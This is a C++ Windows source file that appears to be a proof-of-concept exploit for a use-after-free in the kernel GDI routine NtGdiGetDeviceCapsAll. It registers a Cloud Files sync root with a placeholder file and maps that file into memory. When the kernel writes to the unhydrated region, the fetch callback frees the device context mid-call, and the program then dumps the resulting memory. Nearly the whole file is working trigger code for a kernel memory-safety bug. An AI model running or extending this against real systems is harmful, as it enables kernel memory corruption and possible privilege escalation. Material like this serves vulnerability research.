#include <Windows.h>
#include <ks.h>
#include <ksmedia.h>
#include <cfapi.h>
#include <combaseapi.h>

#include <cstdio>
#include <string>

#pragma comment(lib, "CldApi")

namespace globals {

// The DC object used to trigger the UAF condition.
HDC hdc;

}  // namespace globals

extern "C" {
  BOOL(*NtGdiGetDeviceCapsAll)(HDC hdc, PDEVCAPS pdevcaps);
  BOOL(*NtGdiDeleteObjectApp)(HDC hdc);
};

VOID PrintHex(PVOID Buffer, ULONG dwBytes) {
  PBYTE Data = (PBYTE)Buffer;
  for (ULONG i = 0; i < dwBytes; i += 16) {
    wprintf(L"%.8x: ", i);

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes) {
        wprintf(L"%.2x ", Data[i + j]);
      }
      else {
        wprintf(L"?? ");
      }
    }

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
        wprintf(L"%c", Data[i + j]);
      }
      else {
        wprintf(L".");
      }
    }

    wprintf(L"\n");
  }
}

VOID CALLBACK DoTransferCallback(CONST CF_CALLBACK_INFO* CallbackInfo, CONST CF_CALLBACK_PARAMETERS* CallbackParameters) {
  CF_OPERATION_INFO opInfo = { 0 };
  opInfo.StructSize = sizeof(opInfo);
  opInfo.Type = CF_OPERATION_TYPE_TRANSFER_DATA;
  opInfo.ConnectionKey = CallbackInfo->ConnectionKey;
  opInfo.TransferKey = CallbackInfo->TransferKey;

  SIZE_T length = CallbackParameters->FetchData.RequiredLength.QuadPart;
  SIZE_T offset = CallbackParameters->FetchData.RequiredFileOffset.QuadPart;

  if (offset == 512 * 1024 * 1024) {
    wprintf(L"Requesting offset %zx length %zx\n", offset, length);
    wprintf(L"Freeing hdc %p\n", globals::hdc);
    NtGdiDeleteObjectApp(globals::hdc);
    wprintf(L"Done! Press ENTER to continue... "); getchar();
  }

  PVOID buffer = HeapAlloc(GetProcessHeap(), 0, length);
  RtlFillMemory(buffer, length, 'A');

  CF_OPERATION_PARAMETERS opParams;
  opParams.ParamSize = sizeof(opParams);
  opParams.TransferData.CompletionStatus = 0;
  opParams.TransferData.Buffer = buffer;
  opParams.TransferData.Offset = CallbackParameters->FetchData.RequiredFileOffset;
  opParams.TransferData.Length = CallbackParameters->FetchData.RequiredLength;

  CfExecute(&opInfo, &opParams);

  HeapFree(GetProcessHeap(), 0, buffer);
}

int wmain(int argc, wchar_t** argv) {
  if (argc != 3) {
    wprintf(L"Usage: %s <local syncroot directory> <remote syncroot directory>\n", argv[0]);
    return 1;
  }

  HMODULE hGdi32 = LoadLibrary(L"gdi32full.dll");
  if (hGdi32 == NULL) {
    wprintf(L"Failed to load gdi32full.dll\n");
    return 1;
  }

  NtGdiGetDeviceCapsAll = (BOOL(*)(HDC, PDEVCAPS))GetProcAddress(hGdi32, "NtGdiGetDeviceCapsAll");
  NtGdiDeleteObjectApp = (BOOL(*)(HDC))GetProcAddress(hGdi32, "NtGdiDeleteObjectApp");
  if (NtGdiGetDeviceCapsAll == NULL || NtGdiDeleteObjectApp == NULL) {
    wprintf(L"Failed to find GDI functions.\n");
    return 1;
  }

  std::wstring SyncRoot = argv[1];
  std::wstring RemoteSyncRoot = argv[2];

  DWORD dwFileAttrib = GetFileAttributes(SyncRoot.c_str());
  if (dwFileAttrib == INVALID_FILE_ATTRIBUTES) {
    if (!CreateDirectory(SyncRoot.c_str(), NULL)) {
      wprintf(L"Unable to create syncroot directory\n");
      return 1;
    }
  }
  else if (!(dwFileAttrib & FILE_ATTRIBUTE_DIRECTORY)) {
    wprintf(L"The syncroot path is not a directory!\n");
    return 1;
  }

  std::wstring FilePath = L"file.bin";
  std::wstring CombinedPath = SyncRoot + L"\\" + FilePath;
  std::wstring RemoteCombinedPath = RemoteSyncRoot + L"\\" + FilePath;
  DeleteFile(CombinedPath.c_str());

  GUID ProviderId;
  CLSIDFromString(L"{B196E670-59C7-4D41-9637-C62D80541321}", &ProviderId);

  CF_SYNC_REGISTRATION reg = { 0 };
  reg.StructSize = sizeof(reg);
  reg.ProviderName = L"Foo";
  reg.ProviderVersion = L"1.0";
  reg.ProviderId = ProviderId;

  CF_SYNC_POLICIES policies = { 0 };
  policies.StructSize = sizeof(policies);
  policies.HardLink = CF_HARDLINK_POLICY_ALLOWED;
  policies.Hydration.Primary = CF_HYDRATION_POLICY_PARTIAL;
  policies.Hydration.Modifier = CF_HYDRATION_POLICY_MODIFIER_NONE;
  policies.InSync = CF_INSYNC_POLICY_NONE;
  policies.Population.Primary = CF_POPULATION_POLICY_PARTIAL;

  HRESULT res = CfRegisterSyncRoot(SyncRoot.c_str(), &reg, &policies, CF_REGISTER_FLAG_DISABLE_ON_DEMAND_POPULATION_ON_ROOT);
  if (res == S_OK) {

    CF_CALLBACK_REGISTRATION table[2];
    table[0] = { CF_CALLBACK_TYPE_FETCH_DATA, DoTransferCallback };
    table[1] = { CF_CALLBACK_TYPE_NONE, NULL };

    CF_CONNECTION_KEY key;
    res = CfConnectSyncRoot(SyncRoot.c_str(), table, NULL, CF_CONNECT_FLAG_NONE, &key);
    if (res == S_OK) {

      CF_PLACEHOLDER_CREATE_INFO place_holders[1];
      place_holders[0].RelativeFileName = FilePath.c_str();
      place_holders[0].FsMetadata.FileSize.QuadPart = 1024 * 1024 * 1024;
      place_holders[0].FsMetadata.BasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL;
      place_holders[0].Flags = CF_PLACEHOLDER_CREATE_FLAG_SUPERSEDE | CF_PLACEHOLDER_CREATE_FLAG_MARK_IN_SYNC;
      place_holders[0].FileIdentity = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x130);
      place_holders[0].FileIdentityLength = 0x130;

      DWORD processed;
      res = CfCreatePlaceholders(SyncRoot.c_str(), place_holders, 1, CF_CREATE_FLAG_STOP_ON_ERROR, &processed);
      if (res == S_OK) {
        HANDLE hFile = CreateFile(RemoteCombinedPath.c_str(), MAXIMUM_ALLOWED, 0, NULL, OPEN_EXISTING, 0, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {
          HANDLE hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE | SEC_COMMIT, 0, 0, NULL);
          if (hMap != NULL) {
            char* pMap = (char*)MapViewOfFile(hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0);
            if (pMap != NULL) {
              wprintf(L"File mapped at %p. Press ENTER to continue... ", pMap); getchar();

              globals::hdc = CreateICA("Microsoft XPS Document Writer", "Microsoft XPS Document Writer", NULL, NULL);

              PDEVCAPS devcaps = (PDEVCAPS)&pMap[512 * 1024 * 1024];
              BOOL ret = NtGdiGetDeviceCapsAll(globals::hdc, devcaps);

              wprintf(L"NtGdiGetDeviceCapsAll: %d\n", ret);

              if (ret) {
                wprintf(L"----------\n");
                PrintHex(devcaps, sizeof(DEVCAPS));
              }

              UnmapViewOfFile(pMap);
              CloseHandle(hMap);
              CloseHandle(hFile);
            }
            else {
              wprintf(L"Error mapping file: %d\n", GetLastError());
            }
          }
          else {
            wprintf(L"Error creating file mapping: %d\n", GetLastError());
          }
        }
        else {
          wprintf(L"Error opening file: %d\n", GetLastError());
        }
      }
      else {
        wprintf(L"CfCreatePlaceholders failed with code %x\n", res);
      }

      CfDisconnectSyncRoot(key);
    }
    else {
      wprintf(L"CfConnectSyncRoot failed with code %x\n", res);
    }

    CfUnregisterSyncRoot(argv[1]);
  }
  else {
    wprintf(L"CfRegisterSyncRoot failed with code %x\n", res);
  }

  return 0;
}